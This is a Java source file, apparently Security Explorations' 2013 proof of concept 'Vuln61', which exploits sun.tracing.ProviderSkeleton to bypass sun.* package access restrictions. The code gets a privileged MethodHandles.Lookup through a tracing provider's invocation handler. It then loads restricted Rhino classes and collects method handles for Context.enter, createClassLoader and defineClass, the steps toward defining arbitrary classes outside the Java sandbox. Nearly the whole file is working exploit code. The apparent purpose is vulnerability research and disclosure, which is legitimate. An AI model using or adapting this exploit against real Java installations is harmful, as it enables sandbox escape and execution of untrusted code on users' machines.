/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

/* sun.tracing.ProviderSkeleton                                               */
/* sun. package access bypass via arbitrary static method invocation          */

import java.lang.*;
import java.lang.reflect.*;
import java.lang.invoke.*;
import com.sun.tracing.*;

public class Vuln61 {
  public static InvocationHandler ih;
  public static MethodHandles.Lookup l;

  static {
   init_ih_lookup();
  }

  private static void init_ih_lookup() {
   try {
     ProviderFactory pf=ProviderFactory.getDefaultFactory();
     System.out.println(pf);

     Provider p=pf.createProvider((Class)DummyIf.class);

     ih=Proxy.getInvocationHandler(p);
     System.out.println("ih "+ih);

     Class c=java.lang.invoke.MethodHandles.class;

     Method m=c.getMethod("lookup",new Class[0]);

     l=(MethodHandles.Lookup)ih.invoke(null,m,new Object[0]);
     System.out.println("lookup: "+l);
   } catch (Throwable e) {
    e.printStackTrace();
   }
  }
  
  private static Class load_class(String name) {
   Class res=null;

   try {
     Class c=java.lang.Class.class;

     Class ctab[]=new Class[1];
     ctab[0]=java.lang.String.class;

     Method m=c.getMethod("forName",ctab);

     Object args[]=new Object[1];
     args[0]=name;

     res=(Class)ih.invoke(null,m,args);
   } catch (Throwable e) {
    e.printStackTrace();
   }

   return res;
  }

  private static MethodHandle get_method(Class c,String name,Class rtype,Class ctab[],boolean isstatic) {
   MethodHandle res=null;

   try {
     MethodType desc=MethodType.methodType(rtype,ctab);

     if (isstatic)
      res=l.findStatic(c,name,desc);
     else
      res=l.findVirtual(c,name,desc);
   } catch (Throwable e) {
    e.printStackTrace();
   }

   return res;
  }

  public static void get_classes() {
   try {
    System.out.println("Security manager = "+System.getSecurityManager());

    Class c=load_class("sun.org.mozilla.javascript.internal.Context");
    System.out.println(c);

    BlackBox.Context_class=c;

    c=load_class("sun.org.mozilla.javascript.internal.DefiningClassLoader");
    System.out.println(c);

    BlackBox.DefiningClassLoader_class=c;

    c=load_class("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
    System.out.println(c);

    BlackBox.GeneratedClassLoader_class=c;
   } catch (Throwable e) {
    e.printStackTrace();
   }
  }

  public static void get_methods() {
   try {
    MethodHandle mh=get_method(BlackBox.Context_class,"enter",BlackBox.Context_class,new Class[0],true);
    System.out.println(mh);

    BlackBox.enter_mh=mh;

    Class ctab[]=new Class[1];
    ctab[0]=java.lang.ClassLoader.class;

    mh=get_method(BlackBox.Context_class,"createClassLoader",BlackBox.GeneratedClassLoader_class,ctab,false);
    System.out.println(mh);

    BlackBox.createClassLoader_mh=mh;

    ctab=new Class[2];
    ctab[0]=Class.forName("java.lang.String");
    ctab[1]=(new byte[0]).getClass();

    mh=get_method(BlackBox.DefiningClassLoader_class,"defineClass",java.lang.Class.class,ctab,false);
    System.out.println(mh);

    BlackBox.defineClass_mh=mh;     
   } catch (Throwable e) {
    e.printStackTrace();
   }
  }
}
